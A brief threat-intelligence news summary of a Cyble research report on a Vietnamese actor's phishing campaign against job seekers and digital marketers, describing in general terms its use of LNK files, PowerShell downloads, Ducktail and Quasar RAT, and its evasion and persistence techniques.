Cyble Research Discovers Sophisticated Multi-Stage Malware Attack Targeting Job Seekers and Digital Marketing Professionals

The Cyble Research and Intelligence Lab (CRIL) recently uncovered a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor targeting job seekers and digital marketing professionals. The campaign utilizes Quasar RAT, providing attackers complete control over compromised systems.

The attack begins with spam emails containing phishing attachments, tempting recipients to open an archive file posing as a PDF document. Once the LNK file is executed, PowerShell commands download obfuscated scripts from external sources to bypass traditional detection methods.

The Vietnamese threat actor intensifies operations by disseminating Ducktail malware to digital marketing professionals and expanding its arsenal to include information stealers and remote access trojans. Leveraging Malware-as-a-Service (MaaS) frameworks, these cybercriminals create versatile and scalable campaigns.

This campaign, linked to a Vietnamese threat group, targets professionals in digital marketing, e-commerce, and performance marketing sectors, with a special focus on Meta advertising. The malware employs virtual machine evasion techniques and advanced checks to avoid detection, including inspecting file names related to virtualization software and measuring time discrepancies in systems.

Upon successful execution, the malware checks for administrative privileges, escalates privileges if needed, and ensures persistence by modifying the Windows registry. Defense evasion strategies are employed to disable event tracing and encrypt sensitive data, while the deployment of Quasar RAT allows for data theft and remote control with reduced detectability. This advanced malware campaign highlights the evolving tactics and anonymity of cyber threat actors.